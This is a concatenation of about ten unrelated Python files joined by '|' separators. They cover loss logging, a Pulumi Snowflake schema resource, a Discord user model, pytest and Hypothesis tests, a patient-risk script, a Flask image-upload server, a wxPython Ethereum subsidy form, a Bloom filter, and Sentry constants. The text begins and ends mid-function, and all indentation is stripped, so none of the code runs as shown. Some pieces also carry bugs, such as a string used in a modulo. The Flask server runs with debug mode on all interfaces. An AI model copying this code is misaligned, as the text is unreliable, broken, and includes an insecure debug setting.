# May calculate part loss separately
self.may_calculate_part_loss(loss_list)
# May record losses.
self.may_record_loss(loss_list, step)
# Scale by loss weight
loss *= self.cfg.weight
return {'loss': loss}
def store_calculate_loss(self, loss):
"""
:param loss: torch.stack(loss_list).sum()
:return:
Meter: stores and computes the average of recent values.
"""
if self.cfg.name not in self.meter_dict:
# Here use RecentAverageMeter as Meter
self.meter_dict[self.cfg.name] = Meter(name=self.cfg.name)
# Update the meter, store the current whole loss.
self.meter_dict[self.cfg.name].update(loss.item())
def may_calculate_part_loss(self, loss_list):
"""
:param loss_list: each part loss
:return:
Meter: stores and computes the average of recent values.
For each part loss, calculate the loss separately.
"""
if len(loss_list) > 1:
# stores and computes each part average of recent values
for i in range(len(loss_list)):
# if there is not the meter of the part, create a new one.
if self.part_fmt.format(i + 1) not in self.meter_dict:
self.meter_dict[self.part_fmt.format(i + 1)] = Meter(name=self.part_fmt.format(i + 1))
# Update the meter, store the current part loss
self.meter_dict[self.part_fmt.format(i + 1)].update(loss_list[i].item())
def may_record_loss(self, loss_list, step):
"""
:param loss_list:
:param step:
:return:
Use TensorBoard to record the losses.
"""
if self.tb_writer is not None:
self.tb_writer.add_scalars(main_tag=self.cfg.name,
tag_scalar_dict={self.cfg.name: self.meter_dict[self.cfg.name].avg},
global_step=step
)
# Record each part loss
if len(loss_list) > 1:
self.tb_writer.add_scalars(main_tag='Part ID Losses',
tag_scalar_dict={self.part_fmt.format(i + 1): self.meter_dict[self.part_fmt.format(i + 1)].avg
for i in range(len(loss_list))},
global_step=step
)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SchemaArgs', 'Schema']
@pulumi.input_type
class SchemaArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]] = None):
"""
The set of arguments for constructing a Schema resource.
:param pulumi.Input[str] database: The database in which to create the schema.
:param pulumi.Input[str] comment: Specifies a comment for the schema.
:param pulumi.Input[int] data_retention_days: Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
:param pulumi.Input[bool] is_managed: Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
:param pulumi.Input[bool] is_transient: Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
:param pulumi.Input[str] name: Specifies the identifier for the schema; must be unique for the database in which the schema is created.
:param pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]] tags: Definitions of a tag to associate with the resource.
"""
pulumi.set(__self__, "database", database)
if comment is not None:
pulumi.set(__self__, "comment", comment)
if data_retention_days is not None:
pulumi.set(__self__, "data_retention_days", data_retention_days)
if is_managed is not None:
pulumi.set(__self__, "is_managed", is_managed)
if is_transient is not None:
pulumi.set(__self__, "is_transient", is_transient)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The database in which to create the schema.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a comment for the schema.
"""
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="dataRetentionDays")
def data_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
"""
return pulumi.get(self, "data_retention_days")
@data_retention_days.setter
def data_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_retention_days", value)
@property
@pulumi.getter(name="isManaged")
def is_managed(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
"""
return pulumi.get(self, "is_managed")
@is_managed.setter
def is_managed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_managed", value)
@property
@pulumi.getter(name="isTransient")
def is_transient(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
"""
return pulumi.get(self, "is_transient")
@is_transient.setter
def is_transient(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_transient", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the identifier for the schema; must be unique for the database in which the schema is created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _SchemaState:
def __init__(__self__, *,
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
database: Optional[pulumi.Input[str]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]] = None):
"""
Input properties used for looking up and filtering Schema resources.
:param pulumi.Input[str] comment: Specifies a comment for the schema.
:param pulumi.Input[int] data_retention_days: Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
:param pulumi.Input[str] database: The database in which to create the schema.
:param pulumi.Input[bool] is_managed: Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
:param pulumi.Input[bool] is_transient: Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
:param pulumi.Input[str] name: Specifies the identifier for the schema; must be unique for the database in which the schema is created.
:param pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]] tags: Definitions of a tag to associate with the resource.
"""
if comment is not None:
pulumi.set(__self__, "comment", comment)
if data_retention_days is not None:
pulumi.set(__self__, "data_retention_days", data_retention_days)
if database is not None:
pulumi.set(__self__, "database", database)
if is_managed is not None:
pulumi.set(__self__, "is_managed", is_managed)
if is_transient is not None:
pulumi.set(__self__, "is_transient", is_transient)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a comment for the schema.
"""
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="dataRetentionDays")
def data_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
"""
return pulumi.get(self, "data_retention_days")
@data_retention_days.setter
def data_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_retention_days", value)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The database in which to create the schema.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter(name="isManaged")
def is_managed(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
"""
return pulumi.get(self, "is_managed")
@is_managed.setter
def is_managed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_managed", value)
@property
@pulumi.getter(name="isTransient")
def is_transient(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
"""
return pulumi.get(self, "is_transient")
@is_transient.setter
def is_transient(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_transient", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the identifier for the schema; must be unique for the database in which the schema is created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]]):
pulumi.set(self, "tags", value)
class Schema(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
database: Optional[pulumi.Input[str]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]]] = None,
__props__=None):
"""
## Example Usage
```python
import pulumi
import pulumi_snowflake as snowflake
schema = snowflake.Schema("schema",
comment="A schema.",
data_retention_days=1,
database="db",
is_managed=False,
is_transient=False)
```
## Import
# format is dbName | schemaName
```sh
$ pulumi import snowflake:index/schema:Schema example 'dbName|schemaName'
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] comment: Specifies a comment for the schema.
:param pulumi.Input[int] data_retention_days: Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
:param pulumi.Input[str] database: The database in which to create the schema.
:param pulumi.Input[bool] is_managed: Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
:param pulumi.Input[bool] is_transient: Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
:param pulumi.Input[str] name: Specifies the identifier for the schema; must be unique for the database in which the schema is created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]] tags: Definitions of a tag to associate with the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SchemaArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Example Usage
```python
import pulumi
import pulumi_snowflake as snowflake
schema = snowflake.Schema("schema",
comment="A schema.",
data_retention_days=1,
database="db",
is_managed=False,
is_transient=False)
```
## Import
# format is dbName | schemaName
```sh
$ pulumi import snowflake:index/schema:Schema example 'dbName|schemaName'
```
:param str resource_name: The name of the resource.
:param SchemaArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SchemaArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
database: Optional[pulumi.Input[str]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SchemaArgs.__new__(SchemaArgs)
__props__.__dict__["comment"] = comment
__props__.__dict__["data_retention_days"] = data_retention_days
if database is None and not opts.urn:
raise TypeError("Missing required property 'database'")
__props__.__dict__["database"] = database
__props__.__dict__["is_managed"] = is_managed
__props__.__dict__["is_transient"] = is_transient
__props__.__dict__["name"] = name
__props__.__dict__["tags"] = tags
super(Schema, __self__).__init__(
'snowflake:index/schema:Schema',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
database: Optional[pulumi.Input[str]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]]] = None) -> 'Schema':
"""
Get an existing Schema resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] comment: Specifies a comment for the schema.
:param pulumi.Input[int] data_retention_days: Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
:param pulumi.Input[str] database: The database in which to create the schema.
:param pulumi.Input[bool] is_managed: Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
:param pulumi.Input[bool] is_transient: Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
:param pulumi.Input[str] name: Specifies the identifier for the schema; must be unique for the database in which the schema is created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]] tags: Definitions of a tag to associate with the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SchemaState.__new__(_SchemaState)
__props__.__dict__["comment"] = comment
__props__.__dict__["data_retention_days"] = data_retention_days
__props__.__dict__["database"] = database
__props__.__dict__["is_managed"] = is_managed
__props__.__dict__["is_transient"] = is_transient
__props__.__dict__["name"] = name
__props__.__dict__["tags"] = tags
return Schema(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def comment(self) -> pulumi.Output[Optional[str]]:
"""
Specifies a comment for the schema.
"""
return pulumi.get(self, "comment")
@property
@pulumi.getter(name="dataRetentionDays")
def data_retention_days(self) -> pulumi.Output[Optional[int]]:
"""
Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
"""
return pulumi.get(self, "data_retention_days")
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
The database in which to create the schema.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter(name="isManaged")
def is_managed(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
"""
return pulumi.get(self, "is_managed")
@property
@pulumi.getter(name="isTransient")
def is_transient(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
"""
return pulumi.get(self, "is_transient")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the identifier for the schema; must be unique for the database in which the schema is created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.SchemaTag']]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
|
# Future
from __future__ import annotations
# Standard Library
import json
import time
from typing import TypedDict
# Packages
import discord
from typing_extensions import NotRequired
__all__ = (
"UserData",
"User",
)
# noinspection PyTypedDict
class UserData(TypedDict):
id: int
username: str
discriminator: str
avatar: str | None
bot: NotRequired[bool]
system: NotRequired[bool]
mfa_enabled: NotRequired[bool]
banner: NotRequired[str | None]
accent_color: NotRequired[int | None]
locale: NotRequired[str]
verified: NotRequired[bool]
email: NotRequired[str | None]
flags: NotRequired[int]
premium_type: NotRequired[int]
public_flags: NotRequired[int]
fetch_time: NotRequired[float]
class User:
def __init__(self, data: UserData) -> None:
self.data: UserData = data
self.id: int = int(data["id"])
self.username: str = data["username"]
self.discriminator: str = data["discriminator"]
self._avatar: str | None = data["avatar"]
self.bot: bool | None = data.get("bot")
self.system: bool | None = data.get("system")
self.mfa_enabled: bool | None = data.get("mfa_enabled")
self._banner: str | None = data.get("banner")
self.accent_color: int | None = data.get("accent_color")
self.locale: str | None = data.get("locale")
self.verified: bool | None = data.get("verified")
self.email: str | None = data.get("email")
self.flags: int | None = data.get("flags")
self.premium_type: int | None = data.get("premium_type")
self.public_flags: int | None = data.get("public_flags")
# Properties
@property
def avatar(self) -> str:
if not (avatar := self._avatar):
return f"https://cdn.discordapp.com/embed/avatars/{self.discriminator % len(discord.DefaultAvatar)}.png"
_format = "gif" if avatar.startswith("a_") else "png"
return f"https://cdn.discordapp.com/avatars/{self.id}/{avatar}.{_format}?size=512"
@property
def banner(self) -> str | None:
if not (banner := self._banner):
return None
_format = "gif" if banner.startswith("a_") else "png"
return f"https://cdn.discordapp.com/banners/{self.id}/{banner}.{_format}?size=512"
# Utilities
@property
def fetch_time(self) -> float:
return self.data.get("fetch_time") or time.time()
@property
def has_expired(self) -> bool:
return (time.time() - self.fetch_time) > 20
@property
def json(self) -> str:
data = self.data.copy()
data["fetch_time"] = self.fetch_time
return json.dumps(data)
|
import pytest
from expects import *
from os import walk
from pmp.experiments import Experiment, ExperimentConfig
from pmp.experiments.election_config import ElectionConfig
from pmp.rules import Bloc
@pytest.fixture
def experiment_config(approval_profile):
config = ExperimentConfig()
config.add_candidates(approval_profile.candidates)
config.add_voters(approval_profile.preferences)
return config
@pytest.fixture
def experiment(experiment_config):
experiment = Experiment(experiment_config)
return experiment
def generated_files(path):
"""Helper returning files generated by an experiment"""
for _, dirs, files in walk(path):
if len(dirs) > 0:
return []
return files
def test_run_experiment_set_election_precedence(experiment, tmpdir):
experiment.set_generated_dir_path(tmpdir)
experiment.set_election(Bloc(), 2)
experiment.set_result_filename('bloc')
experiment.run(n=1, log_on=False, save_win=True, split_dirs=False)
files = generated_files(tmpdir)
expect(len(files)).to(equal(1))
election_id = files[0].split('_')[0]
expect(election_id).to(equal('bloc'))
def test_run_experiment_add_election_precedence(experiment, tmpdir):
experiment.set_generated_dir_path(tmpdir)
experiment.set_election(Bloc(), 2)
experiment.set_result_filename('bloc')
experiment.add_election(Bloc(), 1, 'other')
experiment.run(n=1, log_on=False, save_win=True, split_dirs=False)
files = generated_files(tmpdir)
expect(len(files)).to(equal(1))
election_id = files[0].split('_')[0]
expect(election_id).to(equal('other'))
def test_run_experiment_elect_configs_precedence(experiment, tmpdir):
experiment.set_generated_dir_path(tmpdir)
experiment.set_election(Bloc(), 2)
experiment.set_result_filename('bloc')
experiment.add_election(Bloc(), 1, 'other')
election_configs = [ElectionConfig(Bloc(), 1, 'moreOther')]
experiment.run(n=1, log_on=False, save_win=True, elect_configs=election_configs, split_dirs=False)
files = generated_files(tmpdir)
expect(len(files)).to(equal(1))
election_id = files[0].split('_')[0]
expect(election_id).to(equal('moreOther'))
def test_inout_files(experiment):
expect(experiment._Experiment__generate_inout).to(be_false)
experiment.set_inout_filename('inout_fname')
expect(experiment._Experiment__generate_inout).to(be_true)
|
"""
Behavioral based tests for offsets and date_range.
This file is adapted from https://github.com/pandas-dev/pandas/pull/18761 -
which was more ambitious but less idiomatic in its use of Hypothesis.
You may wish to consult the previous version for inspiration on further
tests, or when trying to pin down the bugs exposed by the tests below.
"""
from hypothesis import (
assume,
given,
settings,
)
import pytest
import pytz
import pandas as pd
from pandas._testing._hypothesis import (
DATETIME_JAN_1_1900_OPTIONAL_TZ,
YQM_OFFSET,
)
# ----------------------------------------------------------------
# Offset-specific behaviour tests
@pytest.mark.arm_slow
@given(DATETIME_JAN_1_1900_OPTIONAL_TZ, YQM_OFFSET)
def test_on_offset_implementations(dt, offset):
assume(not offset.normalize)
# check that the class-specific implementations of is_on_offset match
# the general case definition:
# (dt + offset) - offset == dt
try:
compare = (dt + offset) - offset
except (pytz.NonExistentTimeError, pytz.AmbiguousTimeError):
# When dt + offset does not exist or is DST-ambiguous, assume(False) to
# indicate to hypothesis that this is not a valid test case
# DST-ambiguous example (GH41906):
# dt = datetime.datetime(1900, 1, 1, tzinfo=pytz.timezone('Africa/Kinshasa'))
# offset = MonthBegin(66)
assume(False)
assert offset.is_on_offset(dt) == (compare == dt)
@given(YQM_OFFSET)
@settings(deadline=None) # GH 45118
def test_shift_across_dst(offset):
# GH#18319 check that 1) timezone is correctly normalized and
# 2) that hour is not incorrectly changed by this normalization
assume(not offset.normalize)
# Note that dti includes a transition across DST boundary
dti = pd.date_range(
start="2017-10-30 12:00:00", end="2017-11-06", freq="D", tz="US/Eastern"
)
assert (dti.hour == 12).all() # we haven't screwed up yet
res = dti + offset
assert (res.hour == 12).all()
|
idade = int ( input ('Qual a idade do paciente ? '))
peso = float ( input ('Qual o peso do paciente ? '))
if ( idade <= 20 ) and ( 90 < peso ):
print ('Risco 7')
elif ( idade <= 20 ) and ( 60 < peso <= 90 ):
print ('Risco 8')
elif ( idade <= 20 ) and ( peso <= 60):
print ('Risco 9')
elif ( 20 < idade <= 50 ) and ( 90 < peso ):
print ('Risco 4')
elif ( 20 < idade <= 50 ) and ( 60 < peso <= 90 ):
print ('Risco 5')
elif ( 20 < idade <= 50 ) and ( peso <= 60):
print ('Risco 6')
elif ( 50 < idade ) and ( 90 < peso ):
print ('Risco 1')
elif ( 50 < idade ) and ( 60 < peso <= 90 ):
print ('Risco 2')
elif ( 50 < idade ) and ( peso <= 60):
print ('Risco 3')
|
#!/usr/bin/env python3
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/')
def init_recorder():
return render_template('./index2.html')
@app.route('/get_canvas_images', methods=['POST', 'GET'])
def get_canvas_images():
if request.method == 'POST':
raw_images = request.get_data()
symptoms = request.files["_symptoms"].read()
symptom_image = open("canvas_images/symptoms.png", "wb")
symptom_image.write(symptoms)
symptom_image.close()
diagnosis = request.files["_diagnosis"].read()
diagnosis_image = open("canvas_images/diagnosis.png", "wb")
diagnosis_image.write(diagnosis)
diagnosis_image.close()
treatment = request.files["_treatment"].read()
treatment_image = open("canvas_images/treatment.png", "wb")
treatment_image.write(treatment)
treatment_image.close()
tests = request.files["_tests"].read()
tests_image = open("canvas_images/tests.png", "wb")
tests_image.write(tests)
tests_image.close()
others = request.files["_others"].read()
others_image = open("canvas_images/others.png", "wb")
others_image.write(others)
others_image.close()
flag_file = open("canvas_images/flag.txt", "w+")
flag_file.write("1")
flag_file.close()
return "CANVASES SAVED!!!"
if __name__ == '__main__':
app.run(host = "0.0.0.0",debug=True)
|
from .utils import imshow
from .video import Video
from .contour import Contour, find_biggest_contours
__all__ = [
'imshow',
'Video',
'Contour',
'find_biggest_contours',
]
|
#!/usr/bin/python
import wx
import sys
import os
import json
import time
import io
try:
to_unicode = unicode
except NameError:
to_unicode = str
sys.path.insert(0, 'UserInterface')
import models
import ethereumUtils
import injectContract
import generateUser
import executeFunction
class CreateSubvencionsFrame(models.ContractFrame):
def __init__(self, parent, username):
models.ContractFrame.__init__(self, parent)
self.address, self.password = ethereumUtils.get_user_address_pass_entitat_sub(username)
ethereumUtils.unlock_account(self.address, self.password)
##print ("username: " + str(username))
#res = executeFunction.computeOutput(username, '0', "newSubvention", ['2222', '[0]', '[0]', '[22]'], tipus = '2')
##print ("res: " + str(res))
def onCancel( self, event ):
ethereumUtils.kill_geth()
self.Destroy()
def onCreateContract( self, event ):
ethereumUtils.unlock_account(self.address, self.password)
bGender = self.checkBoxGender.GetValue()
bAge = self.checkBoxAge.GetValue()
bPostalCode = self.choicePostalCode.GetValue()
money = self.textMoney.GetValue()
ageLeft = self.textLeft.GetValue()
ageRight = self.textRight.GetValue()
value_postalCode = self.textPostalCode.GetValue()
if not bGender and not bAge and not bPostalCode:
Dialogs.ErrorMessage("Error","No conditions have been chosen")
elif money == "" or money == "0":
Dialogs.ErrorMessage("Error","It has not been specified how much money")
elif (bAge and (ageLeft == "" and ageRight == "")) or (bPostalCode and value_postalCode == ""):
Dialogs.ErrorMessage("Error","The condition has been chosen, but no value has been specified")
else:
l_variables = []
l_operators = []
l_values = []
# variable:
# Age -> 0
# Gender -> 1
# PostalCode -> 2
# operator:
# valor persona (op) valor subvencio
# == -> 0
# != -> 1
# <= -> 2
# >= -> 3
# < -> 4
# > -> 5
if (bGender):
l_variables.append(1)
l_operators.append(0)
l_values.append(self.choiceGender.GetSelection())
if (bAge):
#choiceLeftChoices = [ "<", "<=", "==", "!=" ]
# valor subvencio (op) valor persona
# "<" -> 0 -> 5
# "<=" -> 1 -> 3
# "==" -> 2 -> 0
# "!=" -> 3 -> 1
if (ageLeft != ""):
l_variables.append(0)
leftCondition = self.choiceLeft.GetSelection()
if (leftCondition == 0):
l_operators.append(5)
elif (leftCondition == 1):
l_operators.append(3)
elif (leftCondition == 2):
l_operators.append(0)
else:
l_operators.append(1)
l_values.append(int(ageLeft))
#choiceRightChoices = [ "<", "<=", "==", "!=" ]
# valor persona (op) valor subvencio
# "<" -> 0 -> 4
# "<=" -> 1 -> 2
# "==" -> 2 -> 0
# "!=" -> 3 -> 1
if (ageRight != ""):
l_variables.append(0)
rightCondition = self.choiceRight.GetSelection()
if (rightCondition == 0):
l_operators.append(4)
elif (rightCondition == 1):
l_operators.append(2)
elif (rightCondition == 2):
l_operators.append(0)
else:
l_operators.append(1)
l_values.append(int(ageRight))
if (bPostalCode):
l_variables.append(2)
l_operators.append(0)
l_values.append(str(value_postalCode))
mDades = [str(money), \
str(l_variables), \
str(l_operators), \
str(l_values) ]
inParams = ""
if len(mDades) > 0:
for parameter in mDades:
inParams += parameter+', '
# uint amount, uint8[] variable, uint8[] operator, uint[] value
# '2222' '[0]' '[0]' '[22]'
#res = executeFunction.computeOutput("subvencio1", 0, "newSubvention", mDades)
##print ("computeOutput(\"newSubvention\"): " + str(res))
#print ("mDades: " + str(mDades))
##print ("inParams: " + str(inParams))
ethereumUtils.unlock_account(self.address, self.password)
res = ethereumUtils.execute_function_on_Manager(self.address, "newSubvention", inParams, gas="'4712388'")
#res2 = ethereumUtils.execute_function_on_Person(str(self.address), str(self.ca_address), "confirm", "8,"+res, gas="'4712388'")
#ethereumUtils.unlock_account(self.address, self.password)
#res = ethereumUtils.execute_function_on_Manager("0xa0350e18ffa0e79b37e887f99c0ebfc7e1beb0c3", "newSubvention", inParams)
#print ("computeOutput(\"newSubvention\"): " + str(res))
Dialogs.CorrectMessage("Success","Subvencion has been created successfully")
ethereumUtils.kill_geth()
self.Destroy()
class Dialogs():
@staticmethod
def ErrorMessage(title, message):
Dialogs.Message(title, message, wx.ICON_ERROR)
@staticmethod
def CorrectMessage(title, message):
Dialogs.Message(title, message, wx.OK)
@staticmethod
def InfoMessage(title, message):
Dialogs.Message(title, message, wx.ICON_INFORMATION)
@staticmethod
def Message(title, message, style):
dlg = wx.MessageDialog(parent=None, message=message, caption=title, style=style)
dlg.ShowModal()
dlg.Destroy()
def run(username):
app = wx.App(False)
frame = CreateSubvencionsFrame(None,username)
frame.Show(True)
app.MainLoop()
if __name__ == '__main__':
run("subvencio1")
|
from bloomfilter import BloomFilter
class ScalingBloomFilter:
def __init__(self, capacity, error=0.005, max_fill=0.8, error_tightening_ratio=0.5):
self.capacity = capacity
self.base_error = error
self.max_fill = max_fill
self.items_until_scale = int(capacity * max_fill)
self.error_tightening_ratio = error_tightening_ratio
self.bloom_filters = []
self.current_bloom = None
self._add_bloom()
def _add_bloom(self):
new_error = self.base_error * self.error_tightening_ratio ** len(
self.bloom_filters
)
new_bloom = BloomFilter(self.capacity, new_error)
self.bloom_filters.append(new_bloom)
self.current_bloom = new_bloom
return new_bloom
def add(self, key):
if key in self:
return True
self.current_bloom.add(key)
self.items_until_scale -= 1
if self.items_until_scale == 0:
bloom_size = len(self.current_bloom)
bloom_max_capacity = int(self.current_bloom.capacity * self.max_fill)
# We may have been adding many duplicate values into the Bloom, so
# we need to check if we actually need to scale or if we still have
# space
if bloom_size >= bloom_max_capacity:
self._add_bloom()
self.items_until_scale = bloom_max_capacity
else:
self.items_until_scale = int(bloom_max_capacity - bloom_size)
return False
def __contains__(self, key):
return any(key in bloom for bloom in self.bloom_filters)
def __len__(self):
return int(sum(len(bloom) for bloom in self.bloom_filters))
|
"""Constants for the sentry integration."""
DOMAIN = "sentry"
CONF_DSN = "dsn"
CONF_ENVIRONMENT = "environment"
|
""" Arrary Binary Seach Mod """
def binary_search(arr, value):
